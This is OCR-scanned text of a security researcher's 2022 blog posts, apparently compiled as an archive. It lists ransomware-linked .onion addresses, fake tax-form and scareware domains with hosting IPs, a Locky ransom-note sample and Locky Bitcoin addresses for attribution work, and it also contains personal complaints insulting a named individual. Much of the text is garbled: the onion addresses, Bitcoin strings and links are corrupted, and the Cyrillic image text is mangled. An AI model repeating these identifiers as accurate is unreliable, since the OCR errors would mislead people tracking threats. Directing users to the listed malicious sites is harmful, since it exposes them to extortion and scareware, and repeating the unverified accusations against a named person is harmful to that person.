http://n3twormruynhn30etmxvasum2miix2jgg56xskdoyihra4wthvigyeyd.onion 
http://nalr2uqsave7y2r235am5jsfiklffhsh4jcSnztu3rzvmhklwt5j6kid.onion 
http://nclen75pwlgebpxpsghIicnxsmdvpyrr7ogz36ehhatfmkvakeyden6ad.onion 
http://ng4zyac4ukl4tykmidbzgdlvabogeqsemkp4t35bzvjeve6zm2Iqcjid.onion 
http://obzuqvr5424kkc4unbq2p2i6 7ny3zngce3tbdr37nicjqesgqcgomfqd.onion 
http://omegalock5zxwbhswbisc4202q2i54vdulyvtqqbudqousisjgc7j7yd.onion 
http://omx5iqrdbsoitf3q4xexrqw5r5tfw7vp3vi3li3lfo 7saabxazshnead.onion 
http://oyarbnujct53bizjguvolxou3rmuda2vr72o0syexngbdkhqebwrzsnad.onion 
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http://ozsxj4hwxub7gi0347ac/tyqqozvfioty37skqilzo20qfs4cw2mgtyd.onio n 
http://pay2key2zkg7arp3kv3cuugdaqwuesifnbofun4j6yjdw5ry7zw2asid.onion 
http://pysa2bitc5ldeyfak4seeruqymas4sj5wt5qkcq7aoyg4h2acqieywad.onion 
http://qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.on ion 
http://qkbbaxiuqqcqb5nox4np4qjcniy2q6m7yeluvj7n5i5dn7pgpcwxwfid.onion 
http://quantum445bh3gzuyilxdzs5xdepf3b 7|kcupswvkryf3n7hgzpxebid.onion 
http://r6d636w4 7ncnaukrpvihmtdbvbeltc6enfcuuow3jclomyga/7cz374qd.onion 
http://ramp4u5iz4xx75vmt6nk5xfrsSmrmtokzszqxhhkjqlk7 pbwykaz7zid.onion 
http://rampjcdilqvgkoz5oywutpo6ggl7g6tvddysustfl6qzhr5osr24xxqqd.onion 
http://ranionv3j207wrn3um6de33eccbchhg32mkgnnoi72enkpp7jc25h3ad.onion 
http://ransomocmou6mnbquqz44ewosbkjk305qjsl30rawojexfook2j7esad.onion 
http://rovuetuneohce3ouxjloxtimyyxokb4btncxjbo44fbogxqy7tskinwad.onion 
http://rgleaktxuey67yrgspmhvtnrgqtgogur35lwdrup4d3igtbm3pupc4lyd.onion 
http://rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5dcs4lt4pdrqqd.onion 
http://rnsm777cdsjrsdibs4v5qoeppu3px6sb2igmh53jzrx7ipcrbjz5b2ad.onion 
http://rwiajgajdr4kzInrj5zwebbukpcbrjhupjmk6gufxv6tg7myx34iocad.onion 
http://santat7kpllt6iyvgbr7q4amdv6dzrh6paatvyrzl7ry3zm72zigf4ad.onion 
http://sbc2zv2qnz5vubwtx3aobfpkeaoél4igjegm3xx7tk5sughjkp5jxtqd.onion 
http://solidb2jco63vbhx4sfimnqmwhtdjk4jbbgq7a24cmzzkfse4rduxgid.onion 
http://spookuhvfyxzph54ikjfwf2mwmxt5 72krpom7reyayrmxbkizbvkpaid.onion 
http://stniiomyjliimcgkvdszvgen3eaaoz55hreqqx607 7yvmpwt7gkliffqd.onion 
http://supp24maprinktc7uizgfyqhisx7|lkszb60gh6lwdzpac23w3mh4tvyd.onion 
http://sushInty2j7qdzy64qnvyb6ajkwg /7resd3p6agc2widnawodtcedgjid.oni on 
http://t2tqvp4pctcr7vxhgz5yd5x4ino5tw7jzs3whbntxirhp32djhi7q3id.onion 
http://tdoe2fiiamwkiadhx2a4dfq56ztlqhzl2vckgwmjtoanfaya4kqvvvyd.onion 
http://u67aylig 7i6165 7wxmp2 74eoilaowhp3boljowa6bli63rxyzfzsbtyd.onion 
http://vbfqgehS5nugm6r2u2qvghsdxm3fotf5wbxb5itv6vw7 7vus5frdpuaiid.onion 
http://vomisqjshn4yblehk2vbnil53tlqklxsdaztgphcilto3vdj4geao5qd.onion 
http://veqlxhq7ub5qze3qy56zx2cig2e6tzsgxdspkubwbaygqije6oatma6id.onion 
http://vfokxcdzjbpehgit223vzdzwte4 7|3zcqtafj34qrr26htjo4uf3obid.onion 
http://vqifktlreqoudvulhbzmc5gocbeawl67uvs2pttswemdorbnhaddohyd.onion 
http://vsociethok6sbprvevl4dlwbqrzyhxcxaqpvcqt5belwvsuxaxsutyad.onion 
http://wavbeudogz6byhnardd2lkp2jafims3j 7tj6k6qnywchn2csngvtffqd.onion 
http://wemo2ysyeq6km2nghcrz63dkdhez3j25yw2nvn7xba2z4h7v7gyrfgid.onion 
http://wj3b2wtj 7u2bzup75tzhnso56bin6bnvsxcbwbfcuvzpc4vcixbywlid.onion 
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http://wm6mbuzipviusuc42kcggzkdpbhuv45sn7olyamy6mcqqked3waslibqd.onion 
http://wobpitin7 7vdsdiswr43duntv6eqw4rvphedutpaxycjdie6gg3binad.onion 
http://woe2suafeg6ehxivgvvn4nh6ectbdhdqgc4vzph27mmyn7rjf2c52jid.onion 
http://ws3dh6avé6sjbxxkjpw5ao3wqzmtejnkzheswm4dz5rrwvular7xvkqd.onion 
http://x2miyuiwpib2imjr5ykyjngdu7v6vprkkhjltrk4qafymtawey4qzwid.onion 
http://xembshruusobgbvxg4tcjs3jpdnks6xrr6nbokfxadcnic53yxir22ad.onion 
http://xfr3txoorcyy 7tikjgj5dk3rvo3vsrpyaxnclyohkbfp3h277ap4tiad.onio n 
http://xingnewj6m4qytljhfwemngm/7r7rogrindbq7wrfeepejgxc3bwci7qd.onion 
http://xqkz2rmrqkeqfésjbrb47jfwngqxcd402zvaxxzrpbh2piknms37rw2ad.onion 
http://xw7au5pnwtl6lozbsudkmyd32n6gnqdngitjdppybudan3x3pjgpmpid.on ion 
http://yeuajcizwytgmrntijhxphs6wn5txp2prs6rpndafbsapek3zd4ubcid.onion 
http://yq43o0dyrmzqvyezdindg2tokgogf3pné6bcdtvgczpz5a74tdxjbtk2yd.onion 
http://z6mikrtphid5fmn52nbcbg25tj57sowlm3o0c25g563yvsfmygkcxqbyd.onion 
http://zZowkgghtoawog5noty5nxulmmt2zs7c3yvwr22v4czbffdoly2kl4uad.onion 
http://zeonrefpbompxérwdqadhxgtp2cxgfmoymlliZzazoanisze33pp3x3yd.onion 
http://zj2ex44e2b2xi43m2txk4uwi3l55aglsarre7repw7rkfwpj54j46iqd.onion 
http://zjoxyw5mkacojk5ptn2iprkivg5clow72mjkyk5ttubzxprjjnwapkad.onion 
http://zqaflhty5hyziovsxgqvj2mrz5e5rs60qxzb54zolccfnvtn5w2johad.onion 
http://232fwh5cea3ub6qguz3pynijxfzl2uj3c7 3nbrayipf3gq25vtq2r4qd.onion 
http://aby6efzmp7jzbwgidgqc6ghxi2vwpo6d7eaoo0d5xuoxutrfofsmzcjqd.onion 
http://alpbhvmmm27o03abo3r2mIimjrpdmzle3rykajqc5xsj7j7ejksbpsa36ad.onion 
http://avosqxh72b5ia23d|5fgwcpndkctuzqvh2iefk5imp3pi5gfhel5klad.onion 
http://bianlianlocSan4kgnay30pdemgcryg2kpfcbgczopmm3dnbz3uaunad.onion 
http://bl4cktorpms2gybrcyt52aakcxt6yn37byb6é5uama5cimhifcscnqkid.onion 
http://blog2hkbm6gogpv2b3uytzi3bj5d5zmc4asbybumjkhughas355janyd.onion 
http://blogxxu75w63ujqarv476otld7cyjkq4yoswzt4ijadkjwvg3vrvd5yd.onion 
http://cuba4ikm4jakjgmkezytyawtdgr2xymvy6nvzgw5cglswg3si/76icnqd.onion 
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp5 7zoq300qd.onion 
http://joeg2dct2zhku6c2vwnpxtm2psnjo2xnqvvpoiiwr5hxnc6wrp3uhnad.oni on 
http://jukswsxbh3jsxuddvidrjdvwuohtsy4kxg2axbppiyclomt2qciyfoad.onion 
http://lockbitapt2d73krilbewgv27tquljgxr33xbwwspé6rkyieto7u4ncead.onion 
http://lorenzmlwpzgxq736jzseuterytjueszsvznuibanxomlpkyxk6ksoyd.onion 
http://mrdxtxy6vgeqbmb4rvbvueh2kukb3e3mhu3wdothqn7242gztxyzycid.onion 
http://ng4zyac4ukl4tykmidbzgdlvabogeqsemkp4t35bzvjeve6zm2Iqcjid.onion 
http://omegalock5zxwbhswbisc4202q2i54vdulyvtqqbudqousisjgc7j7yd.onion 
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http://qkbbaxiuqqcqb5nox4np4qjcniy2q6m7yeluvj7n5i5dn7pgpcwxwfid.onion 
http://ransomocmou6mnbquqz44ewosbkjk305qjsl30rawojexfook2j7esad.onion 
http://rnsm777cdsjrsdibs4v5qoeppu3px6sb2igmh53jzrx7ipcrbjz5b2ad.onion 
http://rwiajgajdr4kzInrj5zwebbukpcbrjhupjmk6gufxv6tg7myx34iocad.onion 
http://santat7kpllt6iyvgbr7q4amdv6dzrh6paatvyrzl7ry3zm72zigf4ad.onion 
http://stniiomyjliimcgkvdszvgen3eaaoz55hreqqx607 7yvmpwt7gkliffqd.onion 
http://vsociethok6sbprvevl4dlwbqrzyhxcxaqpvcqt5belwvsuxaxsutyad.onion 
http://xw7au5pnwtl6lozbsudkmyd32n6gnqdngitidppybudan3x3pjgpmpid.onion 
http://zj2ex44e2b2xi43m2txk4uwi3l55aglsarre7repw/7rkfwpj54j46iqd.onion 


Stay tuned! 


1. https://blogger . googleusercontent . com/img/b/R29VZ2x1/AVVXsEjS$1jV2C59WAmhMJ1k19SofQF_gu4-hHXSh6f2i-WyV40HWb 


LS_yEtkAyJOnKaeiCWVwjv0O0qZBueh4cnxXXm1N9EmfPEw-n61310 


2. https: //ddanchev.blogspot .com/2022/08/exposing- compilation-of-known.htm 
3. https: //ddanchev.blogspot.com/search/label/Ransomware 


18.9.2 Dancho Danchev’s Disappearance - 2010 - Official Complaint Against Re- 
public of Bulgaria Regarding Dancho Danchev’s Illegal Law Enforcement Ar- 
rest Home Molestation and Kidnapping Attempt - A Compilation - Part Two 
(2022-09-21 23:30) 


[1] 
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eps Kou rpaxrop ee 
2 Dg Ee ae iro ee 
0D? 5 AP Port nae ums ¢ new 2 
e583 es K a nay Ha lo 
~~ nyoa nu “nu eee 
rd yubctpad Bp CTpoto Cewpetn') 
npoppamMa 3a XaKeCPH. He 
BpuTrantckKo Pasy3HaBanHe 
LOAN bBpka4Hah 7H3BECTHHA 
OT0T 38 CHF ypHOCcT H KHOEDP 
aTaKHB CBeTa 
"Toea e mone fu naii-cnuameanun Heazcapcewu baozep 


& cecmoéeen mamabé 6 egepama NaQ mexnuuecka 


Cazypnocm* 


[2]Awesome. [3]Awesome - Part Two. [4JAwesome - Part Three. [5]Awesome - Part Four. 


[6]define: kidnapping 


From the deepest and ugliest and most disgusting corners of the universal irrelevance called 


Bulgaria’s guess what - Internet connectivity and connection at its best - a single peasant-aria 
land dipshit Known as Yavor Kolev ceased to exist. 


[7] 
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bine ox 


NAM BETETO 


Bd AEB in 


MAM RETETO 
SunTierer 


Stay tuned! 


1. https: //blogger. googleusercontent .com/img/b/R29vZ2x1/AVvXsEgilxuBwEdfnc15GC7MkJ25WwHMnb5F wDdk4sVQPB1u_oka9 


yK701v12ik4aogD8WHS5wxHLIOQU7FUirhOhM_QOCzsRThisUUcOBXt 
. https: //ddanchev.substack.com/p/republic-of-bulgaria-through- the 
. https: //ddanchev. blogspot .com/2022/06/dancho-danchevs-disappearance-2010.htm 


2 

3 

4. https: //ddanchev. blogspot. com/2022/07/how-i-got-robbed-and-beaten-and.htm 

5. https: //ddanchev. blogspot .com/2021/12/why-did-bulgarias-dans-agency-gave-me.htm 
6 
7 


. https: //www.google.com/search?q=define/3Akidnapping 
. https: //blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsEgB jf 1wXKGe1 70HodXEPyPYCAqwAHQY9fD3j cd-e2EN9TxwD 
CZsvALGXQXn3SWef AYbS j UuCbpzvTgRGTKSH3Crk3c8SmNXZERYO9 


18.9.3 Upcoming Launch of Dancho Danchev’s Dark Web Content Media Empire! 
Visit Us Today! (2022-09-23 07:21) 


[1] 
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Dancho Danchev’s Dark Web Media Empire = U.S Intelligence Communify’2:0—Emaik 
dancho.danchev@hush.com + Donate BitCoin - belgqrs9vq6xns7azpfruhvd6jthkyx2samxunxd6y 


aid =o = . - ~ - 
are ; 7% 
Dancho Danchev's Dark Web Media Empire - U.S Intelligence Community 2.0 - Email: dancho.danchev@hush.com - Donate BitCoin - 
belqrs9vq6xns7azpfruhvd6jthkyx2sdfnxunxd6y 


Archives 


Categories 
Dear blog readers, 


After approximately 17 years of operation of this [2]blog I’ve decided that the time has finally 


come to launch a new big blogging and security and cybercrime research project this time on 
the Dark Web. 


Therefore | would like to welcome you do visit my [3]Dark Web Content Media Empire network 
of blogs. 


Main URL: [4]http://vu6e24gayw5xbzqocxtjbilgskquh7d2jliczddkakvfk7saxv6 omrid.onion 


The ultimate goal here would be to present my knowledge in a variety of categories where 
| intend to populate all of my Dark Web Onion blog categories on a daily basis potentially 
reaching out to a new set of readers including both new and old readers who are used to my 
blogging style and are familiar with my work and research. 


Sample screenshot of Dancho Danchev’s Dark Web Content Media Empire Dark Web Onion: 
[5] 
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| don’t mean to be weird or something but what’s "Pink Paradise"? "Pink Paradise" aims to 
bring high-quality and never published before interviews and content materials from the adult 
entertainment industry which | aim to produce on my own. There will be also approximately 
12 new category and blog additions that | intend to begin working on as of today. 


The rest is just the beginning of a known story to what | refer to as my blogging rhythm. 


Stay tuned! 


1 
2. https: //archive.org/download/dancho-danchev-blog-e-book/Dancho_Danchev_Blog_E-Book.zip 

3, http: //vu6e24gay¥ExbzqoextJbigskquha2j1icaddkakv fk saxv6ourid-onion/ 

4, http: //ru6e24gayvSxbzqocatjbilgskquha2j1iczddkakvfksaxvSourid. onion) 

5 


ttps://blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsEi0_VP£PE-aJ£UGup1Z4U3MVUiXZ69aiiZbUiRbCoKK5t37K 


QY50m41Gxz2k- Xnm8zpTdqLevuy790jutExVtX30mZ5-UJaHg0Ipn. 


18.10 October 


18.10.1 Attending Sofia Cyber Sec and Cyber Security Talks in Bulgaria! - Come and 
Join Me! (2022-10-04 10:01) 
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AI N' CYBER 


THE BULGARIAN CONFERENCE DESIGNED TO PROVIDE VITAL 
INFORMATION ON THE LATEST CUTTING-EDGE TECHNOLOGIES, 
TRENDS AND CHALLENGES IN THE FAST-EVOLVING WORLD OF 

CYBERSECURITY AND ARTIFICIAL INTELLIGENCE 


Dear friends and colleagues, 


I'll be in Bulgaria this week and the week after attending two very interesting and important 
cyber security events including a third event in November where I'll hold a presentation on the 
topic of DDoS (Distributed Denial of Service) attacks. 


The first even which I'll attend tomorrow is [2]Sofia Cyber Sec and the second which I'll attend- 
ing next week will be [3]Cyber Security Talks in Bulgaria where | recently had the privilege to 
meet and have a conversation with the event organizer which is quite an important initiative in 
my homeland where I’m proud to attend the event and meeting with local experts and analysts 
in the field. 


If you’re based in Bulgaria or attending you can drop me a line at dancho.danchev@hush.com 
in case you’re interested in catching up and meeting face to face. 


Stay tuned! 


1. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEilp6Sfm4bWhuqkmiBgh8Fpumqy qa6QD86D2r265- JAvFKje 
_WZvEsRxJMFY14SKVttPuDXm9ab-ti2ZQnasjyikrJfj00G7PoNwut 

2. https://www.sofiacybersec.com/ 

3. https://www.cybersecuritytalks.bg/ 


18.10.2 Dancho Danchev’s 2010 Disappearance - Official Complaint Against Harass- 


ment Courtesy of Republic of Bulgaria - An OSINT Analysis (2022-10-12 15:03) 


[1] 
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Knock knock! Who’s there? Can you read my lips? But slowly? It’s Republic of Bulgaria within 
the very bottom of Eastern Europe which they are not part of harassing me my research the 
security industry and my family where the primary idea of this post is to complain officially and 
make it easier for this factual post based on real home molestation and local police kidnapping 
attempt courtesy of the city of Troyan which is my hometown and local gang robbing me and 
stealing from me under the influence of local robbers and corrupt kidnappers known as Bulgaria 
Law Enforcement. 


wei. BANDICAM com 


Put [2]him [3]here. Awesome! [4]Thanks! 


Stay tuned! 
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http://tax-form-8582-instructions.trodlocho. corn/ 
http://arizona-tax-form-a-4.trodlocho.com/ 
BEB http: //mcd-property-tax-forr.trodlocho. com/ 


http://md-state-tax-form.trodlocho.com/ 
BEB http: “irs-tax-form-8621 trodlocho.com/ 
http: //tax-form-1120-instructions.trodlocho.com/ 
http://pennsylvania-tax-form-pa100.trodlocha. com/ 
http:/Awal-mart-w2-tax-form.trodlocho.cam/ 
http: /irs-tax-form-104a.trodlacho. carm/ 
Bhitp://free-1099-tax-form-nevada.trodlocho.com/ 
http://540ez-tax-form-instructions.trodlacho.com/ 
http://state-of-maine-tax-form.trodlocho. com/ 
http://1040.a-tax-form-printable.trodlocho. com? 
http://irs-tax-form-1040a.trodlocho.cam/ 
Bhttp://nys-tax-form-it-272 trodlacho.corm/ 
http://fed-tax-form-8863.trodlocho. com/ 
http:/federal-payroll-tax-form.trodlocho.cam/ 
http:/Aurbo-tax-form-5498.trodlocho.cam/ 
eA tp: //child-release-tax-form.trodlocho. com/ 
BB http: income-tax-forrn-schedule-a.trodlocho. corné 
http://irs-tax-form-2441 .trodlocho. corn/ 
Bhttp://pa-state-income-tax-form.trodlacho.com/ 
http://5329-tax-form-instructions.trodlacho.com/ 
http://hawaii-income-tax-form.trodlocha. com/ 
http: //federal-estate-tax-form.trodlacho.cam/ 
http://oregon-non-resident-tax-form.trodlocho. cam/ 
EE) http: //conneticut-state-tax-form-withholding.trodlocho. corné 
http://ne-income-tax-form-d-400.trodlacho. carn? 
http:/Aw-4-tax-form.trodlacho.camé 
http://illinois-estimated-tax-form.trodlocho. com/ 
http://of-cincinnati-tax-form.trodlocho.com/ 

Sieg http://state-of michigan-individual-tax-form.trodlacho.com/ 
http:/federal-tax-form-for-2007 trodlocho.com/ 


An updated portfolio of scareware/fake security software, parked at 94.102.51.26; 
188.40.61.236; 83.133.126.155; 91.212.107.5; 94.102.48.29 has been introduced: 
bestpersonalprotectionv2 .com 

onlinesecurescannerv3 .com 

basicsystemscannerv3 .com 

onlinebestscannerv3 .com 

basicsystemscannervé6é .com 

bestpersonalprotectionv7 .com 

basicsystemscannervs .com 

thankyouforscan .com 

onlinepersonalscanner .com 

basicsystemscanner .com 

onlineproantivirusscanner .com 

personalantivirusprotection .com 

internetantivirusscanner .com 

govirusscanner .com 
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1. https://blogger. googleusercontent .com/img/b/R29vZ2x1/AVvXsEhuic8_QC2QoBSY-brjOT- 1cvLfoi7JdyjIneuHrvhh_k3Y0 


AE7HVH38t jdM4nMw2y YUOkLWuFFaRnnk Ih62fEGCgcvrBm0usMv6sg 
2. https://www.1linkedin.com/in/yavorkole 


3. https://www.interpol.int/en/How-we-work/Notices/View-Red-Notices 
4. https: //ddanchev. blogspot .com/search/label/Bulgaria 


18.10.3 Summarizing a Portfolio of Recently Released WhoisXML API Threat Re- 
search Reports Courtesy of Me - An Analysis (2022-10-18 11:49) 


@ 


WhoisXMLAPI 


[1] 
Dear blog readers, 


I’ve decided to share with everyone a recently released portfolio of research that | conducted 
for [2]WhoisXML API where I’m currently acting as a [3]DNS Threat Researcher. 


Sample articles include: 
- [4]Conti Ransomware: Still Alive and Kicking 
- [5]NotPetya: Not Quite Dead, as Recent loCs Show 
- [6]Koobface Makes a Comeback 
- [7]KrotReal: Is the Koobface Bot Master Back in Business? 
- [8]The Current State of Malicious PPI Businesses and Affiliate Networks 
- [9]JExposing a Currently Active Ashiyane Digital Security Domain Infrastructure 
- [LO]DIY Web Attacks Might Still Live on via WebAttacker 
- [11]Exposing the Infrastructure Behind the Democratic National Committee System Intrusion 
- [12]ls the Bakasoftware Operation Still Up and Running? 
- [L3]URL Shortening Gone Wrong with GCHQ 
- [14]What Is Anonymous International Up to Now 
- [15]Uncovering the Current Workings of Guccifer 2.0 
- [16]Should We Consider the Maze Ransomware Extinct? 
- [17]Shedding Light on the Darkode Forum 
- [18]Probing an Active Digital Trail of Iranian Hackers 
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- [19]The Inner Workings of the Russian Business Network 

- [20]On the Frontlines of the Syrian Electronic Army’s Digital Arsenal 
- [21]Probing Networks of Cybercrime-Friendly Forums 

- [22]Insights into an Active Malicious Soam Domain Portfolio 

- [23]Alleviating BlackEnergy-Enabled DDoS Attacks 


Stay tuned! 


1. https: //blogger . googleusercontent.com/img/b/R29vZ2x1/AVvXsEjQwf IghLc3D20K006d6rvY3ZugXr8fYXb- j jrXvfuakXCLZ 
DsgtsjsLYKTZE3hu7U JmchI20b0CSn_xwiUvI2-OV£DPixBOucTbr6é 


2. https://whoisxmlapi.com/ 


. https: //linkedin.com/in/ddanche 


. https://main. whoisxmlapi.com/threat-reports/conti-ransomware-still-alive-and-kicking 


ttps://main.whoisxmlapi.com/threat-reports/conti-ransomware-still-alive-and-kicking 


3 

4 

5. https: //main.whoisxmlapi.com/threat-reports/conti-ransomware-still-alive-and-kicking 

6 

7. https://main.whoisxmlapi.com/threat-reports/krotreal-is-the-koobface-bot-master-back-in-business 
8 


ttps://main.whoisxmlapi.com/threat-reports/the-current-state-of-malicious-ppi-businesses-and-affiliate- 


9. https://main.whoisxmlapi.com/threat-reports/exposing-a-currently-active-ashiyane-digital-security-domai 


infrastructure 


com/threat-reports/diy-web-attacks-might-still-live-on-via-webattacke 


.com/threat-reports/exposing-the-infrastructure-behind-the-democratic-national-c 


://main.whoisxmlapi.com/threat-reports/is-the-bakasoftware-operation-still-up-and-running 

://main.whoisxmlapi.com/threat-reports/url-shortening- gone-wrong-with-gchq 
.whoisxmlapi.com/threat-reports/what-is-anonymous- international-up-to-no 
.whoisxmlapi.com/threat-reports/uncovering-the-current-workings-of-guccifer-2- 
.whoisxmlapi.com/threat-reports/should-we-consider-the-maze-ransomware- extinct 
.whoisxmlapi.com/threat-reports/shedding-light- on-the-darkode-forw 
.whoisxmlapi.com/threat-reports/probing-an-active-digital-trail-of-iranian-hackers 


.whoisxmlapi.com/threat-reports/the- inner-workings-of-the-russian-business-network 


whoisxmlapi.com/threat-reports/on-the-frontlines-of-the-syrian-electronic-armys-digital-ars 


whoisxmlapi.com/threat-reports/probing-networks-of-cybercrime-friendly-forums 


whoisxmlapi.com/threat-reports/insights-into-an-active-malicious-spam-domain-portfolio 


whoisxmlapi.com/threat-reports/alleviating-blackenergy-enabled-ddos-attacks 


18.10.4 Dancho Danchev’s 17 Years of Publicly Accessible Cyber Attack and Russian 
Threat Actor Research - Grab The Torrent! (2022-10-21 23:56) 


[1] 
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Only the enlighted. 
Original post [2]here. Direct 265GB torrent download [3]here. Alternative link [4]here. 


Stay tuned and enjoy! 


1, https: blogger. googleusercontent con/ing/b/R29vZ2x1/AVWKsEiPSxyli i8ERWCO7DiUp_CUUgSethex_VCUvéENCwal-140 
2, https //acadenictorrents, com/details/00dcd44d17as 7oi2f954£4266e0dbcS#05e0887 

3, https //acadenictorrents, con/download/004cd44at7At7o12cf9S4t4266e0dbc5186e0847 torrent 

4 


ttps://archive.org/download/dancho_danchev_cybercrime_research_USB_Stick_torrent/Dancho_Danchev_Cybercrim 


e_Forum_Research_Toolset_USB_Compilation_Latest_2022. 


18.10.5 Exposing a Compilation of Known Locky Ransomware Themed BitCoin Ad- 
dresses - An OSINT Analysis (2022-10-22 23:04) 
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=*al+_+ 
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!!! IMPORTANT INFORMATION !!1!! 


All of your files are encrypted with RSA-2048 and AES-128 ciphers. 
More information about the RSA and AES can be found here: 

http: //en.wikipedia.org/wiki/RSA_(cryptosystem) 

http: //en.wikipedia.org/wiki/Advanced_Encryption_Standard 


Decrypting of your files is only possible with the private key and decrypt program, which is on our secret server. 
To receive your private key follow one of the links: 

1. 

2. 

3. 


If all of this addresses are not available, follow these steps: 
1. Download and install Tor Browser: 
2. After a successful installation, run the browser and wait for initialization. 
3. Type in the address bar: 
4. Follow the instructions on the site. 


!!! Your personal identification ID: tn! 


+|=++||*-$~.$4°$~". 
=$=$--_ 

~+$_|_+$$.- 

$~+|$~= 


Dear blog readers, 


I’ve decided to share with everyone a compilation of known and publicly accessible Locky ran- 
somware Bitcoin addresses with the idea to assist everyone in their cyber attack or cyber 
Campaign attribution efforts. 


Sample known Locky ransomware themed BitCoin addresses include: 
1FARtez141MFFaCdRXF5bWMNa6fLBdCrjL 
1123pJv8jzeFQaCV4w644pzQjJzVWay2zcA 
1129TSjKtx65E35GiUo04AYVeyo48twbrGXx 
112AmFATxzhuSpvtz1hfpa3Zrw3BG276pc 
112bgquxJZDPuQiXG8tsS7B8ER6rEetrAw 
112GocBgFSnaote6krx828qaockFraD8mp 
112igisnkkrR2rPgujxhBkTELajuNYxq8Z 
112wjYgWapZU8gTPR7hLoKg8iEh496vKxP 
1131P1hjj7h9NinHRCKNWGFifK4gGoe5EF 
1136MFiqgBmoVWpqWrlokF3D5XMabwVLB5z 
11382a48qWatCiSqVNBFZUKN91M7Dcdev 
113DQh713pR9rsEWTgae9DGfVzY5f17Sbj 
113QcTeGajE3YMKU1JD7QMRgkuKFFsHkiG 
113y9h8ch6wASL3DE4WDysDVxXa4LsNkH3 
1143t96LASL6q6UMAJKQKd5BLkeV6Q19ys 
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11445 ybEvoBuFCnaYGni4KQDgKRZ3huiJX 
114BqWjEYTXuVzFAEc4qdz72j3muFPMSfH 
114DARzZ595UwWHRrWjR2mufuUCBifgHTHEw 
114ngXYgYz3gLAaumxKUZM42KR4HzsDdjn 
114T9gEo) 7G9LGOAL9wWDT1InBGGQm3hiS]y 
114TqRY9x6byYf5HZcBdoDfHUZX68tdgTG 
1154LSM4xWaAY8shZj7jdmP4coWKD16S5f 
1156MWEn J8gkK9kn2UdpPUcavyqC39mZxPw 
115ia9StrwWqT6xJ9Sd92hm6rA4EBPsE3W 
115j3623Lx42gyC1h9EygmcqH6mb6bgDiky 
115vefbFY2PCL4cYAoCcCB4TcjUGnrgLKw 
115znkek4VL6yyBrC6nTultd4D9n4kbgnk 
11697Zq8pAWXEXAbh2zvPTfVt6Vn7DAMzw 
1169bxadw4JaEe34sNhcDz38AugtLGp965 
11MvtJdLMh55y3RnS7iPaCra7JS6vZsSEF 
11r5p8FPmLu9zw1XjufDcydG3rjQ6tzjc 
11UC4DMzTR1qQnNEHs9XpotWYAmzs6nBM 
11UUVivRcVdRJWymipDPB6WzbxzWmL7a3B 
121aku4wARyCjEMrpWb9VfSnF9DWbjjVgn 
121D2DAFrRGLHoeZDaATI1rjEYj69EknvsT 
121JhGRZGL57JgqxtdsxkUB2kF5Xyz7nPh 
121QX41wBNYsmSFEGQ4qnRpNPSai3sUSMZ 
121XywrM8cRm2wcccPU7AbGxAAudHukiQL 
1224txnU673nCa5Wxa9JHkpGmreTMfknsA 
122wW6H5sV2h9dyAwk4rcedF4piGnzmbFFN 
122xQbcFm6jfrtwfGHdxCdGrmwvUuNxjIft 
1231w7pJYCa9W9qBSJYNBp6QrTaCSV6YuD 
1233d91rHpBN8spVJqv42syB72)JzflgGjb 
1234KPsuDZ6n6htPvxYRyzc4ND9iyBGhkY 
1238Mzucsxe7SiDQSssCLQYppFHHqF3zpi 
123JmhW8mtaRTJJBHFFNxkuyDyyYmozJTd 
123VWsgKcx1cjn5KBepCV26hF Xu7TcWfSY 
123zTvjw931gKezg4bMwaBS45YBQjJh3pZ 
1246tUptR5e67CG7MAFPtjVpSdM1dCUH2V 
124ap6uHgT5MeB1L5FPUENhQ2DdG4boyy3 
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124EhTSKcd4M1RNisFp7hpkmEj6UEqLq1H 
124jbjnjjy8t42BDmaBd8kx6fJc2CTfdeE 
124XtfRqTrw1HP1g15z15cVXB38T3EWUZR 
12524A8PP7PFcDXa9BpGHghPuVcciCvCn8 
125AoxRRMZz5GpASK5sCChATKfNvbSzBF5 
125DU467DRf6JBvS2Q49jsYdY4ZvVGBbUc 
125YGMHAVJ9EQZhwJTaENhQcaeuqgbHK8} 
125YW2ptUaSzt6p3R7bvBCivbVJcLEeJQH 
1263vfRQB4z86JdLQZA7DEmRgxNsvRNuzm 
1260NycBsQTyAunbn53nUS5qlwm6BSG85Y 
126x8kik2WChKXAXQEGZR4akjsWESTWZow 
12797s8yzdH)x75f2Hnb84CRqLR6ykjBAx 
127gTQMvKxn5r6EhmigwXy27R1rBGtJ2Vq 
127M2VSZFNghk8sZs33vDcTZT5cxndengS 
127MgKCjtPfBpcjJXQpjmthMmeMsHwC1BQ 
127TntHYgrASVmoRNnbriKRBGyMdjA7nxP 
127y4JUM7GDWSRB8FnF6SFKPEYBcwiNC48 
127ZmcfEJQPN3VF7YiIRXznRUSP9XFLRT vx 
128KyTpc8uFJjH3TKQqwjHf4EtqLBqj1kf 
128mpaTzac6LueCW]bFABubxho8bppMCCh 
129nsZZr79dNfr9fKSGqeAgT BBgCVvMyKU 
129qSWnnjJgaKkjqgphitXZJM4us7DghuKEQ 
129UJgwpPveL6GUHEdHnKNmGACkKuMDZfpx 
129VKWjZX3MErCYXCaYjGgDwcpMAfS9nQq 
129VXFYAjmgijAc2bL9MAPyr25FQMYLymQ 
12aDqouMF2C2UVqGnZPW8NnSFTKDjFhoRV 
12AG1UgkMsrt5gzdAtadtQfEpjqQV5AQyM 
12aG56SE7MiPEZNZGsrGj 7UBWWHhRhofrj 
12aJv7J7Y LcHekzXeAEfu8cbtQFekt7Mk8 
12ayDveFNnZ4rkHHs9VL5VROF7VkXsLSDp 
12aYrgSNW38bbYQ11oJiCi97g945f2rugE 
12b2cm2Ae6qqcHknAommf9Nfrv49ddeLzU 
12B3hpaiiut347TnylLCAtaCWD9Lk2umG8y 
12b3pCCdEpygZKxmFaBJrKzZZY8jDXXGJD 


12b8UJclJwX7EBLN85rWy5s|z6KEWEXgYf 
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12BBafApDponRH9K3RDtaZDxLLGFYwFXZt 
12BCVTUtBhDJ6BEToBkUJjS6pcC8iC7kih 
12BfsGS7Jt33McacenxGkvaLnEGbTumo4y 
12bFt7MX9U5yiMxXA1luftqZcamWVPAdL4Pj 
12bh99VY4p4nmtCv5d7A6eXbznhauPjYut 
